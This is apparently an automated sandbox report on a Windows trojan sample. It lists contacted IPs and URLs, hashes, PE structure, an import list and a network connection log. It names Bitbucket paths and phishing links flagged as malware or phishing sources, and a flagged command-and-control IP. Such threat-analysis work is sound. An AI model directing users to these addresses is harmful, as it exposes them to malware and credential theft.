https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.192.141.1	bitbucket.org	United States		16509	AMAZON-02US	false
146.70.169.164	unknown	United Kingdom		2018	TENET-1ZA	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467090
Start date and time:	2024-07-03 17:59:38 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
Detection:	MAL
Classification:	mal84.troj.spyw.evad.winEXE@1/0@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 30 Number of non-executed functions: 51
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.192.141.1	A662vmc5co.exe	Get hash	malicious	Unknown	Browse	bitbucket.org/kennethoswald1/aoz918/downloads/LEraggt.exe
	lahPWgosNP.exe	Get hash	malicious	Amadey	Browse	bitbucket.org/alex222111/testproj/downloads/s7.exe
	SecuriteInfo.com.HEUR.Trojan.Script.Generic.18657.xlsx	Get hash	malicious	Unknown	Browse	bitbucket.org/!api/2.0/snippets/tinypro/rEG6d7/ba869eaf2433f3e0b56e4d0776eb5117fc09b21f/files/street-main
	SecuriteInfo.com.HEUR.Trojan.Script.Generic.18657.xlsx	Get hash	malicious	Unknown	Browse	bitbucket.org/!api/2.0/snippets/tinypro/rEG6d7/ba869eaf2433f3e0b56e4d0776eb5117fc09b21f/files/street-main
	SecuriteInfo.com.HEUR.Trojan.Script.Generic.20331.xlsx	Get hash	malicious	Unknown	Browse	bitbucket.org/!api/2.0/snippets
	SecuriteInfo.com.HEUR.Trojan.Script.Generic.20331.xlsx	Get hash	malicious	Unknown	Browse	bitbucket.org/!api/2.0/snippets
	Paid invoice.ppa	Get hash	malicious	AgentTesla	Browse	bitbucket.org/!api/2.0/snippets/warzonepro/Egjbp5/1b96dd9b300f88e62e18db3170d33bf037793d72/files/euromanmain
	PO#1487958_10.ppa	Get hash	malicious	Unknown	Browse	bitbucket.org/!api/2.0/snippets/warzonepro/KME7g4/7678df565d5a8824274645a03590fc72588243f0/files/orignalfinal
	Purchase Inquiry_pdf.ppa	Get hash	malicious	AgentTesla	Browse	bitbucket.org/!api/2.0/snippets/warzonepro/8E74BM/47d1c5bd6af9e6b1718ba4d2e049cba6beb1ac95/files/charles1final
	Purchase Inquiry_pdf.ppa	Get hash	malicious	Unknown	Browse	bitbucket.org/!api/2.0/snippets/warzonepro/8E74BM/47d1c5bd6af9e6b1718ba4d2e049cba6beb1ac95/files/charles1final
146.70.169.164	5GOuTtZoQn.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse
	SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.15788.4670.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse
	JuHVfiAuLo.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse
	LXbM8RbhLa.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse
	EiPVv5yELP.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse
	6IMo1kM9CC.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse
	SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.2850.19434.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse
	37e6e5d8b399fefb9ae774516ff6367e800c69a272e18a654bb84ccff2d7c67a_dump.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse
	OBbrO5rwew.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bitbucket.org	d8gZVaN0ms.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, Vidar	Browse	104.192.141.1
	setup.exe	Get hash	malicious	RedLine	Browse	104.192.141.1
	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	104.192.141.1
	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	104.192.141.1
	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	104.192.141.1
	423845.msi	Get hash	malicious	Unknown	Browse	104.192.141.1
	423845.msi	Get hash	malicious	Unknown	Browse	104.192.141.1
	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	104.192.141.1
	YlluVjKozT.exe	Get hash	malicious	LummaC	Browse	104.192.141.1
	AaSwePhLEn.exe	Get hash	malicious	RHADAMANTHYS	Browse	104.192.141.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	AWB NO. 077-57676135055.exe	Get hash	malicious	FormBook	Browse	44.227.65.245
	MKCC-MEC-RFQ-115-2024.exe	Get hash	malicious	FormBook	Browse	3.64.163.50
	https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9	Get hash	malicious	HTMLPhisher	Browse	108.156.39.22
	https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=	Get hash	malicious	HTMLPhisher	Browse	108.156.39.60
	7sAylAXBOb.exe	Get hash	malicious	Unknown	Browse	3.64.163.50
	http://booking.extnnehotteir.com/admin/o2shi1bka89	Get hash	malicious	Unknown	Browse	18.239.36.121
	7sAylAXBOb.exe	Get hash	malicious	Unknown	Browse	3.64.163.50
	5a5O0c0oJP.exe	Get hash	malicious	Unknown	Browse	3.64.163.50
	https://www.filemail.com/t/RuKZYfeB	Get hash	malicious	HTMLPhisher	Browse	18.239.69.107
	5a5O0c0oJP.exe	Get hash	malicious	Unknown	Browse	3.140.13.188
TENET-1ZA	5GOuTtZoQn.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	146.70.169.164
	SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.15788.4670.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	146.70.169.164
	JuHVfiAuLo.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	146.70.169.164
	LXbM8RbhLa.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	146.70.169.164
	EiPVv5yELP.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	146.70.169.164
	6IMo1kM9CC.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	146.70.169.164
	file.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	146.70.169.164
	SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.2850.19434.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	146.70.169.164
	37e6e5d8b399fefb9ae774516ff6367e800c69a272e18a654bb84ccff2d7c67a_dump.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	146.70.169.164
	OBbrO5rwew.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	146.70.169.164

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	GuLoader, Remcos	Browse	104.192.141.1
	file.exe	Get hash	malicious	Vidar	Browse	104.192.141.1
	d8gZVaN0ms.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, Vidar	Browse	104.192.141.1
	1dntbjwU2s.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.192.141.1
	XZ50BK5JPZ.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.192.141.1
	BomqT2a55e.exe	Get hash	malicious	AgentTesla	Browse	104.192.141.1
	eXiJWkp8OE.exe	Get hash	malicious	GuLoader	Browse	104.192.141.1
	MzjwuZnJF0.exe	Get hash	malicious	GuLoader	Browse	104.192.141.1
	7Pqym5wyq5.exe	Get hash	malicious	GuLoader	Browse	104.192.141.1
	fuqDLDLV7g.exe	Get hash	malicious	Unknown	Browse	104.192.141.1

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.297510031778876
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
File size:	578'048 bytes
MD5:	da4b6f39fc024d2383d4bfe7f67f1ee1
SHA1:	7cc975d9ff785e269163897907d0b9b3cee29956
SHA256:	544697a024abaea1b24eaa3d89869b2c8a4c1acf96d4e152f5632d338d054c9e
SHA512:	d73cc4d911d9e61711b97cb9212d5bc93cb1b1314a39945934eb92239a31728fcca7fefbec0143bad915b0a7a6b93df11d0ab7f559737aa7ec920bd24243fffe
SSDEEP:	12288:No4ykJuqlLJop9G3/AmAGWn7sfPJYQIMt8KHsTH:NoBsLaDKAmAbUJ+M2K2
TLSH:	82C4A5D9AFD2F455D21210F828ACA6D4642135B62A3CCD7B7A6C7F1858BC1B05ED323B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I...I...I...1...I...1...I...1...I..l....I..l....I..l....I...1...I...I...I..]....I..]....I..Rich.I..................PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x45fddf
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66843B77 [Tue Jul 2 17:40:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	35504252928d496732012120d2a694cf

Entrypoint Preview

Instruction
call 00007FC88125B8CDh
jmp 00007FC88125B14Fh
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007FC88125B2EBh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007FC88125B2DCh
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007FC88125B2DEh
add edx, 28h
cmp edx, esi
jne 00007FC88125B2BCh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007FC88125B2CBh
push esi
call 00007FC88125BB86h
test eax, eax
je 00007FC88125B2F2h
mov eax, dword ptr fs:[00000018h]
mov esi, 0048B494h
mov edx, dword ptr [eax+04h]
jmp 00007FC88125B2D6h
cmp edx, eax
je 00007FC88125B2E2h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007FC88125B2C2h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007FC88125B2D9h
mov byte ptr [0048B498h], 00000001h
call 00007FC88125B59Dh
call 00007FC88125E36Ah
test al, al
jne 00007FC88125B2D6h
xor al, al
pop ebp
ret
call 00007FC8812651F9h
test al, al
jne 00007FC88125B2DCh
push 00000000h
call 00007FC88125E371h
pop ecx
jmp 00007FC88125B2BBh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [0048B499h], 00000000h
je 00007FC88125B2D6h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8900c	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8c000	0x32e8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x86858	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x86900	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x86798	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x79000	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x77e8c	0x78000	9e45a4630a2fd5447349abc06da5ba33	False	0.35067138671875	data	6.152971403892286	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x79000	0x10734	0x10800	854ab3d9f5aa38904d708a3dab1457fb	False	0.48267341382575757	data	5.546025199521765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x8a000	0x1fa4	0x1200	d35631abba941db880ab843b0f7a916f	False	0.173828125	data	2.9933256669502333	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x8c000	0x32e8	0x3400	555ed79938d9abc95574c202a751a64d	False	0.7635967548076923	data	6.577645291962688	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

WaitForSingleObject, GetCurrentProcess, CreateThread, VirtualAlloc, VirtualProtect, FreeLibrary, GetModuleHandleA, GetProcAddress, LoadLibraryA, MultiByteToWideChar, CreateFileW, WideCharToMultiByte, GetStringTypeW, RaiseException, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, TerminateProcess, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 18:01:31.006051064 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:31.006103039 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:31.006201982 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:31.039977074 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:31.040025949 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:31.637073994 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:31.637255907 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:31.794209003 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:31.794238091 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:31.794572115 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:31.794630051 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:31.816696882 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:31.864497900 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.011830091 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.011905909 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.011962891 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.011995077 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.012010098 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.012032986 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.016223907 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.016236067 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.016263962 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.016293049 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.016299963 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.016321898 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.016340971 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.102221012 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.102360964 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.103374004 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.103418112 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.103465080 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.103476048 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.103513002 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.103548050 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.103573084 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.103621006 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.104372978 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.104440928 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.104444981 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:01:32.104497910 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.104827881 CEST	49705	443	192.168.2.7	104.192.141.1
Jul 3, 2024 18:01:32.104849100 CEST	443	49705	104.192.141.1	192.168.2.7
Jul 3, 2024 18:02:00.865425110 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.870512009 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.870616913 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.870665073 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.870942116 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.875483036 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.875595093 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.875792027 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.875811100 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.875885963 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.875890017 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.875895977 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.875936031 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.876065969 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.876075983 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.876084089 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.876092911 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.876101017 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.876174927 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.880412102 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.880455971 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.880790949 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.880827904 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.880834103 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.880866051 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.880870104 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.880878925 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.880912066 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.880942106 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.880989075 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.928143024 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.928333998 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:00.975888968 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:00.976216078 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.023883104 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.024064064 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.072189093 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.072501898 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.123843908 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.124080896 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.171914101 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.172046900 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.223908901 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.224034071 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.271857023 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.272041082 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.327904940 CEST	2227	49707	146.70.169.164	192.168.2.7
Jul 3, 2024 18:02:01.327970028 CEST	49707	2227	192.168.2.7	146.70.169.164
Jul 3, 2024 18:02:01.375914097 CEST	2227	49707	146.70.169.164	192.168.2.7
